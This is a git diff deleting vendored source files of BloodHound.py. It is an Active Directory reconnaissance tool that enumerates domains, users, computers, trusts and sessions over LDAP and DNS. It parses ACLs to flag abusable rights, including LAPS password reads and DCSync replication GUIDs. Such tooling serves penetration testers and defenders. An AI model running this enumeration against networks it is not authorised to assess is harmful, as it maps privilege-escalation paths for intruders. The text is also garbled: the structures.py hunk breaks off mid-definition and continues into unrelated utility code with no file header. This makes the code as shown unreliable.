- logging.error('Could not find a Global Catalog in this domain!'\ - ' Resolving will be unreliable in forests with multiple domains') - return False - try: - # Convert the hostname to an IP, this prevents ldap3 from doing it - # which doesn't use our custom nameservers - logging.info('Connecting to GC LDAP server: %s' % initial_server) - q = self.ad.dnsresolver.query(initial_server, tcp=self.ad.dns_tcp) - for r in q: - ip = r.address - except (resolver.NXDOMAIN, resolver.Timeout): - for server in self.ad.gcs(): - # Skip the one we already tried - if server == initial_server: - continue - try: - # Convert the hostname to an IP, this prevents ldap3 from doing it - # which doesn't use our custom nameservers - logging.info('Connecting to GC LDAP server: %s' % server) - q = self.ad.dnsresolver.query(server, tcp=self.ad.dns_tcp) - for r in q: - ip = r.address - break - except (resolver.NXDOMAIN, resolver.Timeout): - continue - - try: - self.gcldap = self.ad.auth.getLDAPConnection(hostname=ip, gc=True, - baseDN=self.ad.baseDN, protocol=protocol) - except LDAPSocketOpenError: - # It didnt like ldaps, try ldap - self.gcldap = self.ad.auth.getLDAPConnection(hostname=ip, gc=True, - baseDN=self.ad.baseDN, protocol='ldap') - - return self.gcldap is not None - - def search(self, search_filter='(objectClass=*)', attributes=None, search_base=None, generator=True, use_gc=False, use_resolver=False, query_sd=False): - """ - Search for objects in LDAP or Global Catalog LDAP. 
- """ - if self.ldap is None: - self.ldap_connect() - if search_base is None: - search_base = self.ad.baseDN - if attributes is None or attributes == []: - attributes = ALL_ATTRIBUTES - if query_sd: - # Set SD flags to only query for DACL and Owner - controls = security_descriptor_control(sdflags=0x05) - else: - controls = None - # Use the GC if this is requested - if use_gc: - searcher = self.gcldap - else: - # If this request comes from the resolver thread, use that - if use_resolver: - searcher = self.resolverldap - else: - searcher = self.ldap - - sresult = searcher.extend.standard.paged_search(search_base, - search_filter, - attributes=attributes, - paged_size=200, - controls=controls, - generator=generator) - try: - # Use a generator for the result regardless of if the search function uses one - for e in sresult: - if e['type'] != 'searchResEntry': - continue - yield e - except LDAPNoSuchObjectResult: - # This may indicate the object doesn't exist or access is denied - logging.warning('LDAP Server reported that the search in %s for %s does not exist.', search_base, search_filter) - - def ldap_get_single(self, qobject, attributes=None, use_gc=False, use_resolver=False): - """ - Get a single object, requires full DN to object. - This function supports searching both in the local directory and the Global Catalog. - The connection to the GC should already be established before calling this function. 
- """ - if use_gc: - searcher = self.gcldap - else: - # If this request comes from the resolver thread, use that - if use_resolver: - searcher = self.resolverldap - else: - searcher = self.ldap - if attributes is None or attributes == []: - attributes = ALL_ATTRIBUTES - try: - sresult = searcher.extend.standard.paged_search(qobject, - '(objectClass=*)', - search_scope=BASE, - attributes=attributes, - paged_size=10, - generator=False) - except LDAPNoSuchObjectResult: - # This may indicate the object doesn't exist or access is denied - logging.warning('LDAP Server reported that the object %s does not exist.', qobject) - return None - for e in sresult: - if e['type'] != 'searchResEntry': - continue - return e - - def get_domain_controllers(self): - entries = self.search('(userAccountControl:1.2.840.113556.1.4.803:=8192)', - ['dnshostname', 'samaccounttype', 'samaccountname', - 'serviceprincipalname', 'objectSid']) - - return entries - - - def get_netbios_name(self, context): - try: - entries = self.search('(ncname=%s)' % context, - ['nETBIOSName'], - search_base="CN=Partitions,%s" % self.ldap.server.info.other['configurationNamingContext'][0]) - except (LDAPAttributeError, LDAPCursorError) as e: - logging.warning('Could not determine NetBiosname of the domain: %s', str(e)) - return next(entries) - - def get_objecttype(self): - """ - Function to get objecttype GUID - """ - self.objecttype_guid_map = dict() - - if self.ldap is None: - self.ldap_connect() - - sresult = self.ldap.extend.standard.paged_search(self.ldap.server.info.other['schemaNamingContext'][0], - '(objectClass=*)', - attributes=['name', 'schemaidguid']) - for res in sresult: - if res['attributes']['schemaIDGUID']: - guid = str(UUID(bytes_le=res['attributes']['schemaIDGUID'])) - self.objecttype_guid_map[res['attributes']['name'].lower()] = guid - - if 'ms-mcs-admpwdexpirationtime' in self.objecttype_guid_map: - logging.debug('Found LAPS attributes in schema') - self.ad.has_laps = True - else: - 
logging.debug('No LAPS attributes found in schema') - - def get_domains(self, acl=False): - """ - Function to get domains. This should only return the current domain. - """ - entries = self.search('(objectClass=domain)', - [], - generator=True, - query_sd=acl) - - entriesNum = 0 - for entry in entries: - entriesNum += 1 - # Todo: actually use these objects instead of discarding them - # means rewriting other functions - domain_object = ADDomain.fromLDAP(entry['attributes']['distinguishedName'], entry['attributes']['objectSid']) - self.ad.domain_object = domain_object - self.ad.domains[entry['attributes']['distinguishedName']] = entry - try: - nbentry = self.get_netbios_name(entry['attributes']['distinguishedName']) - self.ad.nbdomains[nbentry['attributes']['nETBIOSName']] = entry - except IndexError: - pass - - logging.info('Found %u domains', entriesNum) - - return entries - - def get_forest_domains(self): - """ - Function which searches the LDAP references in order to find domains. - I'm not sure if this is the best function but couldn't find anything better. - - This searches the configuration, which is present only once in the forest but is replicated - to every DC. - """ - entries = self.search('(objectClass=crossRef)', - ['nETBIOSName', 'systemFlags', 'nCName', 'name'], - search_base="CN=Partitions,%s" % self.ldap.server.info.other['configurationNamingContext'][0], - generator=True) - - entriesNum = 0 - for entry in entries: - # Ensure systemFlags entry is not empty before running the naming context check. 
- if not entry['attributes']['systemFlags']: - continue - # This is a naming context, but not a domain - if not entry['attributes']['systemFlags'] & 2: - continue - entry['attributes']['distinguishedName'] = entry['attributes']['nCName'] - entriesNum += 1 - # Todo: actually use these objects instead of discarding them - # means rewriting other functions - d = ADDomain.fromLDAP(entry['attributes']['nCName']) - # We don't want to add our own domain since this entry doesn't contain the sid - # which we need later on - if entry['attributes']['nCName'] not in self.ad.domains: - self.ad.domains[entry['attributes']['nCName']] = entry - self.ad.nbdomains[entry['attributes']['nETBIOSName']] = entry - - # Store this number so we can easily determine if we are in a multi-domain - # forest later on. - self.ad.num_domains = entriesNum - logging.info('Found %u domains in the forest', entriesNum) - - def get_groups(self, include_properties=False, acl=False): - properties = ['distinguishedName', 'samaccountname', 'samaccounttype', 'objectsid', 'member'] - if include_properties: - properties += ['adminCount', 'description'] - if acl: - properties += ['nTSecurityDescriptor'] - entries = self.search('(objectClass=group)', - properties, - generator=True, - query_sd=acl) - return entries - - - def get_users(self, include_properties=False, acl=False): - - properties = ['sAMAccountName', 'distinguishedName', 'sAMAccountType', - 'objectSid', 'primaryGroupID'] - if 'msDS-GroupMSAMembership'.lower() in self.objecttype_guid_map: - properties.append('msDS-GroupMSAMembership') - if include_properties: - properties += ['servicePrincipalName', 'userAccountControl', 'displayName', - 'lastLogon', 'lastLogonTimestamp', 'pwdLastSet', 'mail', 'title', 'homeDirectory', - 'description', 'userPassword', 'adminCount', 'msDS-AllowedToDelegateTo', 'sIDHistory'] - if acl: - properties.append('nTSecurityDescriptor') - - # Query for GMSA only if server supports it - if 'msDS-GroupManagedServiceAccount' in 
self.ldap.server.schema.object_classes: - query = '(|(&(objectCategory=person)(objectClass=user))(objectClass=msDS-GroupManagedServiceAccount))' - else: - logging.debug('No support for GMSA, skipping in query') - query = '(&(objectCategory=person)(objectClass=user))' - entries = self.search(query, - properties, - generator=True, - query_sd=acl) - return entries - - - def get_computers(self, include_properties=False, acl=False): - properties = ['samaccountname', 'userAccountControl', 'distinguishedname', - 'dnshostname', 'samaccounttype', 'objectSid', 'primaryGroupID'] - if include_properties: - properties += ['servicePrincipalName', 'msDS-AllowedToDelegateTo', - 'lastLogon', 'lastLogonTimestamp', 'pwdLastSet', 'operatingSystem', 'description', 'operatingSystemServicePack'] - if 'msDS-AllowedToActOnBehalfOfOtherIdentity'.lower() in self.objecttype_guid_map: - properties.append('msDS-AllowedToActOnBehalfOfOtherIdentity') - if self.ad.has_laps: - properties.append('ms-mcs-admpwdexpirationtime') - if acl: - # Also collect LAPS expiration time since this matters for reporting (no LAPS = no ACL reported) - if self.ad.has_laps: - properties += ['nTSecurityDescriptor', 'ms-mcs-admpwdexpirationtime'] - else: - properties.append('nTSecurityDescriptor') - entries = self.search('(&(sAMAccountType=805306369)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))', - properties, - generator=True, - query_sd=acl) - - entriesNum = 0 - for entry in entries: - entriesNum += 1 - self.ad.computers[ADUtils.get_entry_property(entry, 'distinguishedName', '')] = entry - self.ad.computersidcache.put(ADUtils.get_entry_property(entry, 'dNSHostname', '').lower(), entry['attributes']['objectSid']) - - logging.info('Found %u computers', entriesNum) - - return entries - - def get_memberships(self): - entries = self.search('(|(memberof=*)(primarygroupid=*))', - ['samaccountname', 'distinguishedname', - 'dnshostname', 'samaccounttype', 'primarygroupid', - 'memberof'], - generator=False) - return 
entries - - def get_sessions(self): - entries = self.search('(&(samAccountType=805306368)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(|(homedirectory=*)(scriptpath=*)(profilepath=*)))', - ['homedirectory', 'scriptpath', 'profilepath']) - return entries - - def get_trusts(self): - entries = self.search('(objectClass=trustedDomain)', - attributes=['flatName', 'name', 'securityIdentifier', 'trustAttributes', 'trustDirection', 'trustType'], - generator=True) - return entries - - def prefetch_info(self, props=False, acls=False): - if acls: - self.get_objecttype() - self.get_domains(acl=acls) - self.get_forest_domains() - self.get_computers(include_properties=props, acl=acls) - - def get_root_domain(self): - return ADUtils.ldap2domain(self.ldap.server.info.other['configurationNamingContext'][0]) - - -""" -Active Directory data and cache -""" -class AD(object): - - def __init__(self, domain=None, auth=None, nameserver=None, dns_tcp=False): - self.domain = domain - # Object of type ADDomain, added later - self.domain_object = None - self.auth = auth - # List of DCs for this domain. Contains just one DC since - # we query for the primary DC specifically - self._dcs = [] - # Kerberos servers - self._kdcs = [] - # Global catalog servers - self._gcs = [] - - self.domains = {} - self.nbdomains = {} - self.groups = {} # Groups by DN - self.groups_dnmap = {} # Group mapping from gid to DN - self.computers = {} - self.users = {} # Users by DN - - # Create a resolver object - self.dnsresolver = resolver.Resolver() - if nameserver: - self.dnsresolver.nameservers = [nameserver] - # Resolve DNS over TCP? 
- self.dns_tcp = dns_tcp - # Give it a cache to prevent duplicate lookups - self.dnsresolver.cache = resolver.Cache() - # Default timeout after 3 seconds if the DNS servers - # do not come up with an answer - self.dnsresolver.lifetime = 3.0 - # Also create a custom cache for both forward and backward lookups - # this cache is thread-safe - self.dnscache = DNSCache() - # Create a thread-safe SID lookup cache - self.sidcache = SidCache() - # Create a thread-safe SAM lookup cache - self.samcache = SamCache() - # Create SID cache for computer accounts - self.computersidcache = SidCache() - # Object Resolver, initialized later - self.objectresolver = None - # Number of domains within the forest - self.num_domains = 1 - # Does the schema have laps properties - self.has_laps = False - if domain is not None: - self.baseDN = ADUtils.domain2ldap(domain) - else: - self.baseDN = None - - def realm(self): - if self.domain is not None: - return self.domain.upper() - else: - return None - - def override_dc(self, dcname): - self._dcs = [dcname] - - def override_gc(self, gcname): - self._gcs = [gcname] - - def dcs(self): - return self._dcs - - def gcs(self): - return self._gcs - - def kdcs(self): - return self._kdcs - - def create_objectresolver(self, addc): - self.objectresolver = ObjectResolver(addomain=self, addc=addc) - - def dns_resolve(self, domain=None, kerberos=True, options=None): - logging.debug('Querying domain controller information from DNS') - - basequery = '_ldap._tcp.pdc._msdcs' - - if domain is not None: - logging.debug('Using domain hint: %s' % str(domain)) - query = '_ldap._tcp.pdc._msdcs.%s' % domain - else: - # Assume a DNS search domain is (correctly) configured on the host - # in which case the resolver will autocomplete our request - query = basequery - - try: - - q = self.dnsresolver.query(query, 'SRV', tcp=self.dns_tcp, lifetime=30.0) - - if str(q.qname).lower().startswith('_ldap._tcp.pdc._msdcs'): - ad_domain = 
str(q.qname).lower()[len(basequery):].strip('.') - logging.info('Found AD domain: %s' % ad_domain) - - self.domain = ad_domain - if self.auth.domain is None: - self.auth.domain = ad_domain - self.baseDN = ADUtils.domain2ldap(ad_domain) - - for r in q: - dc = str(r.target).rstrip('.') - logging.debug('Found primary DC: %s' % dc) - if dc not in self._dcs: - self._dcs.append(dc) - - except resolver.NXDOMAIN: - raise resolver.NXDOMAIN - - try: - q = self.dnsresolver.query(query.replace('pdc','gc'), 'SRV', tcp=self.dns_tcp) - for r in q: - gc = str(r.target).rstrip('.') - logging.debug('Found Global Catalog server: %s' % gc) - if gc not in self._gcs: - self._gcs.append(gc) - - except resolver.NXDOMAIN: - # Only show warning if we don't already have a GC specified manually - if options and not options.global_catalog: - logging.warning('Could not find a global catalog server. Please specify one with -gc') - - if kerberos is True: - try: - q = self.dnsresolver.query('_kerberos._tcp.dc._msdcs', 'SRV', tcp=self.dns_tcp) - for r in q: - kdc = str(r.target).rstrip('.') - logging.debug('Found KDC: %s' % str(r.target).rstrip('.')) - if kdc not in self._kdcs: - self._kdcs.append(kdc) - self.auth.kdc = self._kdcs[0] - except resolver.NXDOMAIN: - pass - - return True - - - def get_domain_by_name(self, name): - for domain, entry in iteritems(self.domains): - if 'name' in entry['attributes']: - if entry['attributes']['name'].upper() == name.upper(): - return entry - # Also try domains by NETBIOS definition - for domain, entry in iteritems(self.nbdomains): - if domain.upper() == name.upper(): - return entry - return None - -""" -Active Directory Domain -""" -class ADDomain(object): - def __init__(self, name=None, netbios_name=None, sid=None, distinguishedname=None): - self.name = name - self.netbios_name = netbios_name - self.sid = sid - self.distinguishedname = distinguishedname - - - @staticmethod - def fromLDAP(identifier, sid=None): - dns_name = ADUtils.ldap2domain(identifier) - 
return ADDomain(name=dns_name, sid=sid, distinguishedname=identifier) diff --git a/external/bloodhound/ad/structures.py b/external/bloodhound/ad/structures.py deleted file mode 100755 index e0cce62..0000000 --- a/external/bloodhound/ad/structures.py +++ /dev/null @@ -1,50 +0,0 @@ -#################### -# -# Copyright (c) 2018 Fox-IT -# -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in all -# copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -# SOFTWARE. 
-# -#################### - -from impacket.structure import Structure -from struct import unpack - - -# LDAP SID structure - from impackets SAMR_RPC_SID, except the SubAuthority is LE here -class LDAP_SID_IDENTIFIER_AUTHORITY(Structure): - structure = ( - ('Value', '6s'), - ) - - - -class LDAP_SID(Structure): - structure = ( - ('Revision', '(S-[0-9\-]+)') - xml_logontype_rex = re.compile('([A-Za-z0-9]+)') - - @staticmethod - def domain2ldap(domain): - return 'DC=' + ',DC='.join(str(domain).rstrip('.').split('.')) - - - @staticmethod - def ldap2domain(ldap): - return re.sub(',DC=', '.', ldap[ldap.find('DC='):], flags=re.I)[3:] - - - @staticmethod - def tcp_ping(host, port, timeout=1.0): - try: - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - s.settimeout(timeout) - s.connect((host, port)) - s.close() - return True - except KeyboardInterrupt: - raise - except: - return False - - @staticmethod - def ip2host(ip, resolver=resolver, use_tcp=False): - result = ip - try: - addr = reversename.from_address(ip) - except dns.exception.SyntaxError: - logging.warning('DNS: invalid address: %s' % ip) - return result - - try: - answer = str(resolver.query(addr, 'PTR', tcp=use_tcp)[0]) - result = answer.rstrip('.') - except (dns.resolver.NXDOMAIN, dns.resolver.Timeout) as e: - pass - except: - logging.warning('DNS lookup failed: %s' % addr) - pass - - return result - - # Translate the binary SID from LDAP into human-readable form - @staticmethod - def formatSid(siddata): - return LDAP_SID(siddata).formatCanonical() - - # Translate SidType to strings accepted by BloodHound - @staticmethod - def translateSidType(sidType): - if sidType == 1: - return 'User' - if sidType == 2: - return 'Group' - # sidType 4 means "alias", this is actually a Domain Local Group - if sidType == 4: - return 'Group' - if sidType == 9: - return 'Computer' - if sidType == 5: - return 'Wellknown' - # Can be a (by BloudHound) unsupported type - # must not be an empty string since this breaks our CSV 
files - return 'Unknown' - - @staticmethod - def resolve_ad_entry(entry): - """ - Translate an LDAP entry into a dictionary containing the - information used by BloodHound - """ - resolved = {} - dn = '' - domain = '' - - account = ADUtils.get_entry_property(entry, 'sAMAccountName', '') - dn = ADUtils.get_entry_property(entry, 'distinguishedName', '') - if dn != '': - domain = ADUtils.ldap2domain(dn) - resolved['objectid'] = ADUtils.get_entry_property(entry, 'objectSid', '') - resolved['principal'] = ('%s@%s' % (account, domain)).upper() - if not ADUtils.get_entry_property(entry, 'sAMAccountName'): - if 'ForeignSecurityPrincipals' in dn: - resolved['principal'] = domain.upper() - resolved['type'] = 'foreignsecurityprincipal' - if 'name' in entry['attributes']: - # Fix wellknown entries - ename = entry['attributes']['name'] - if ename in ADUtils.WELLKNOWN_SIDS: - name, sidtype = ADUtils.WELLKNOWN_SIDS[ename] - resolved['type'] = sidtype.lower() - resolved['principal'] = ('%s@%s' % (name, domain)).upper() - # Well-known have the domain prefix since 3.0 - resolved['objectid'] = '%s-%s' % (domain.upper(), resolved['objectid']) - else: - # Foreign security principal - resolved['objectid'] = ename - else: - resolved['type'] = 'Unknown' - else: - accountType = ADUtils.get_entry_property(entry, 'sAMAccountType') - if accountType in [268435456, 268435457, 536870912, 536870913]: - resolved['type'] = 'Group' - elif ADUtils.get_entry_property(entry, 'msDS-GroupMSAMembership', default=b'', raw=True) != b'': - resolved['type'] = 'User' - short_name = account.rstrip('$') - resolved['principal'] = ('%s@%s' % (short_name, domain)).upper() - elif accountType in [805306369]: - resolved['type'] = 'Computer' - short_name = account.rstrip('$') - resolved['principal'] = ('%s.%s' % (short_name, domain)).upper() - elif accountType in [805306368]: - resolved['type'] = 'User' - elif accountType in [805306370]: - resolved['type'] = 'trustaccount' - else: - resolved['type'] = 'Domain' - - 
return resolved - - @staticmethod - def resolve_sid_entry(entry, domain): - """ - Convert LsarLookupSids entries to entries for the SID cache, which should match - the format from the resolve_ad_entry function. - """ - resolved = {} - account = entry['Name'] - - resolved['principal'] = ('%s@%s' % (account, domain)).upper() - resolved['type'] = ADUtils.translateSidType(entry['Use']).lower() - - # Computer accoutns have a different type - if resolved['type'] == 'computer': - short_name = account.rstrip('$') - resolved['principal'] = ('%s.%s' % (short_name, domain)).upper() - - return resolved - - @staticmethod - def get_entry_property(entry, prop, default=None, raw=False): - """ - Simple wrapper that gets an attribute from ldap3 dictionary, - converting empty values to the default specified. This is primarily - for output to JSON - """ - try: - if raw: - value = entry['raw_attributes'][prop] - else: - value = entry['attributes'][prop] - # Doesn't exist - except KeyError: - return default - # Empty -> return default - if value == []: - return default - try: - # One value and we don't expect a list -> return the first value - if len(value) == 1 and default != []: - return value[0] - except TypeError: - # Value doesn't have a len() attribute, so we skip this - pass - return value - - @staticmethod - def win_timestamp_to_unix(seconds): - """ - Convert Windows timestamp (100 ns since 1 Jan 1601) to - unix timestamp. - """ - seconds = int(seconds) - if seconds == 0: - return -1 - return int((seconds - 116444736000000000) / 10000000) - - @staticmethod - def parse_task_xml(xml): - """ - Parse scheduled task XML and extract the user and logon type with - regex. Is not a good way to parse XMLs but saves us the whole parsing - overhead. 
- """ - res = ADUtils.xml_sid_rex.search(xml) - if not res: - return None - sid = res.group(1) - res = ADUtils.xml_logontype_rex.search(xml) - if not res: - return None - logon_type = res.group(1) - return (sid, logon_type) - -class AceResolver(object): - """ - This class resolves ACEs containing rights, acetype and a SID to Aces containing - BloodHound principals, which can be outputted to json. - This is mostly a wrapper around the sid resolver calls - """ - def __init__(self, addomain, resolver): - self.addomain = addomain - self.resolver = resolver - - def resolve_aces(self, aces): - aces_out = [] - for ace in aces: - out = { - 'RightName': ace['rightname'], - 'AceType': ace['acetype'], - 'IsInherited': ace['inherited'] - } - # Is it a well-known sid? - if ace['sid'] in ADUtils.WELLKNOWN_SIDS: - out['PrincipalSID'] = u'%s-%s' % (self.addomain.domain.upper(), ace['sid']) - out['PrincipalType'] = ADUtils.WELLKNOWN_SIDS[ace['sid']][1].capitalize() - else: - try: - entry = self.addomain.sidcache.get(ace['sid']) - except KeyError: - # Look it up instead - # Is this SID part of the current domain? If not, use GC - use_gc = not ace['sid'].startswith(self.addomain.domain_object.sid) - ldapentry = self.resolver.resolve_sid(ace['sid'], use_gc) - # Couldn't resolve... - if not ldapentry: - logging.warning('Could not resolve SID: %s', ace['sid']) - # Fake it - entry = { - 'type': 'Unknown', - 'principal': ace['sid'] - } - else: - entry = ADUtils.resolve_ad_entry(ldapentry) - # Entries are cached regardless of validity - unresolvable sids - # are not likely to be resolved the second time and this saves traffic - self.addomain.sidcache.put(ace['sid'], entry) - out['PrincipalSID'] = ace['sid'] - out['PrincipalType'] = entry['type'] - aces_out.append(out) - return aces_out - - def resolve_binary_sid(self, bsid): - sid = LDAP_SID(bsid).formatCanonical() - out = {} - # Is it a well-known sid? 
- if sid in ADUtils.WELLKNOWN_SIDS: - out['ObjectID'] = u'%s-%s' % (self.addomain.domain.upper(), sid) - out['ObjectType'] = ADUtils.WELLKNOWN_SIDS[sid][1].capitalize() - else: - try: - entry = self.addomain.sidcache.get(sid) - except KeyError: - # Look it up instead - # Is this SID part of the current domain? If not, use GC - use_gc = not sid.startswith(self.addomain.domain_object.sid) - ldapentry = self.resolver.resolve_sid(sid, use_gc) - # Couldn't resolve... - if not ldapentry: - logging.warning('Could not resolve SID: %s', sid) - # Fake it - entry = { - 'type': 'Unknown', - 'principal':sid - } - else: - entry = ADUtils.resolve_ad_entry(ldapentry) - # Entries are cached regardless of validity - unresolvable sids - # are not likely to be resolved the second time and this saves traffic - self.addomain.sidcache.put(sid, entry) - out['ObjectID'] = sid - out['ObjectType'] = entry['type'] - - -class DNSCache(object): - """ - A cache used for caching forward and backward DNS at the same time. - This cache is used to avoid PTR queries when forward lookups are already done - """ - def __init__(self): - self.lock = threading.Lock() - self._cache = {} - - # Get an entry from the cache - def get(self, entry): - with self.lock: - return self._cache[entry] - - # Put a forward lookup in the cache, this also - # puts the reverse lookup in the cache - def put(self, entry, value): - with self.lock: - self._cache[entry] = value - self._cache[value] = entry - - # Put a reverse lookup in the cache. 
Forward lookup - # is not added since reverse is considered less reliable - def put_single(self, entry, value): - with self.lock: - self._cache[entry] = value - -class SidCache(object): - """ - Generic cache for caching SID lookups - """ - def __init__(self): - self.lock = threading.Lock() - self._cache = {} - - # Get an entry from the cache - def get(self, entry): - with self.lock: - return self._cache[entry] - - # Put a forward lookup in the cache, this also - # puts the reverse lookup in the cache - def put(self, entry, value): - with self.lock: - self._cache[entry] = value - -class SamCache(SidCache): - """ - Cache for mapping SAM names to principals. - Identical to the SidCache in behaviour - """ - pass diff --git a/external/bloodhound/enumeration/acls.py b/external/bloodhound/enumeration/acls.py deleted file mode 100755 index 8b3ed91..0000000 --- a/external/bloodhound/enumeration/acls.py +++ /dev/null @@ -1,511 +0,0 @@ -#################### -# -# Copyright (c) 2018 Fox-IT -# -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in all -# copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -# SOFTWARE. -# -#################### -from __future__ import unicode_literals -import logging -import threading -from multiprocessing import Pool -from ldap3.utils.conv import escape_filter_chars -from impacket.uuid import string_to_bin, bin_to_string -from . .ad.utils import ADUtils -from . .lib import cstruct -from io import BytesIO -import binascii -import pprint -from future.utils import iteritems, native_str - -# Extended rights and property GUID mapping, converted to binary so we don't have to do this -# for every comparison. -# Source: https://msdn.microsoft.com/en-us/library/cc223512.aspx -EXTRIGHTS_GUID_MAPPING = { - "GetChanges": string_to_bin("1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"), - "GetChangesAll": string_to_bin("1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"), - "WriteMember": string_to_bin("bf9679c0-0de6-11d0-a285-00aa003049e2"), - "UserForceChangePassword": string_to_bin("00299570-246d-11d0-a768-00aa006e0529"), -} - -def parse_binary_acl(entry, entrytype, acl, objecttype_guid_map): - """ - Main ACL structure parse function. - This is offloaded to subprocesses and takes the current entry and the - acl data as argument. 
This is then returned and processed back in the main process - """ - if not acl: - return entry, [] - sd = SecurityDescriptor(BytesIO(acl)) - relations = [] - # Parse owner - osid = str(sd.owner_sid) - ignoresids = ["S-1-3-0", "S-1-5-18"] - # Ignore Creator Owner or Local System - if osid not in ignoresids: - relations.append(build_relation(osid, 'Owner', inherited=False)) - for ace_object in sd.dacl.aces: - if ace_object.ace.AceType != 0x05 and ace_object.ace.AceType != 0x00: - # These are the only two aces we care about currently - logging.debug('Don\'t care about acetype %d', ace_object.ace.AceType) - continue - # Check if sid is ignored - sid = str(ace_object.acedata.sid) - # Ignore Creator Owner or Local System - if sid in ignoresids: - continue - if ace_object.ace.AceType == 0x05: - is_inherited = ace_object.has_flag(ACE.INHERITED_ACE) - # ACCESS_ALLOWED_OBJECT_ACE - if not ace_object.has_flag(ACE.INHERITED_ACE) and ace_object.has_flag(ACE.INHERIT_ONLY_ACE): - # ACE is set on this object, but only inherited, so not applicable to us - continue - - # Check if the ACE has restrictions on object type (inherited case) - if ace_object.has_flag(ACE.INHERITED_ACE) \ - and ace_object.acedata.has_flag(ACCESS_ALLOWED_OBJECT_ACE.ACE_INHERITED_OBJECT_TYPE_PRESENT): - # Verify if the ACE applies to this object type - if not ace_applies(ace_object.acedata.get_inherited_object_type().lower(), entrytype, objecttype_guid_map): - continue - - mask = ace_object.acedata.mask - # Now the magic, we have to check all the rights BloodHound cares about - - # Check generic access masks first - if mask.has_priv(ACCESS_MASK.GENERIC_ALL) or mask.has_priv(ACCESS_MASK.WRITE_DACL) \ - or mask.has_priv(ACCESS_MASK.WRITE_OWNER) or mask.has_priv(ACCESS_MASK.GENERIC_WRITE): - # For all generic rights we should check if it applies to our object type - if ace_object.acedata.has_flag(ACCESS_ALLOWED_OBJECT_ACE.ACE_OBJECT_TYPE_PRESENT) \ - and not 
ace_applies(ace_object.acedata.get_object_type().lower(), entrytype, objecttype_guid_map): - # If it does not apply, break out of the loop here in order to - # avoid individual rights firing later on - continue - # Check from high to low, ignore lower privs which may also match the bitmask, - # even though this shouldn't happen since we check for exact matches currently - if mask.has_priv(ACCESS_MASK.GENERIC_ALL): - # Report this as LAPS rights if it's a computer object AND laps is enabled - if entrytype == 'computer' and \ - ace_object.acedata.has_flag(ACCESS_ALLOWED_OBJECT_ACE.ACE_OBJECT_TYPE_PRESENT) and \ - entry['Properties']['haslaps']: - if ace_object.acedata.get_object_type().lower() == objecttype_guid_map['ms-mcs-admpwd']: - relations.append(build_relation(sid, 'ReadLAPSPassword', inherited=is_inherited)) - else: - relations.append(build_relation(sid, 'GenericAll', inherited=is_inherited)) - continue - if mask.has_priv(ACCESS_MASK.GENERIC_WRITE): - relations.append(build_relation(sid, 'GenericWrite', inherited=is_inherited)) - # Don't skip this if it's the domain object, since BloodHound reports duplicate - # rights as well, and this might influence some queries - if entrytype != 'domain' and entrytype != 'computer': - continue - - # These are specific bitmasks so don't break the loop from here - if mask.has_priv(ACCESS_MASK.WRITE_DACL): - relations.append(build_relation(sid, 'WriteDacl', inherited=is_inherited)) - - if mask.has_priv(ACCESS_MASK.WRITE_OWNER): - relations.append(build_relation(sid, 'WriteOwner', inherited=is_inherited)) - - # Property write privileges - writeprivs = ace_object.acedata.mask.has_priv(ACCESS_MASK.ADS_RIGHT_DS_WRITE_PROP) - if writeprivs: - # GenericWrite - if entrytype in ['user', 'group'] and not ace_object.acedata.has_flag(ACCESS_ALLOWED_OBJECT_ACE.ACE_OBJECT_TYPE_PRESENT): - relations.append(build_relation(sid, 'GenericWrite', inherited=is_inherited)) - if entrytype == 'group' and can_write_property(ace_object, 
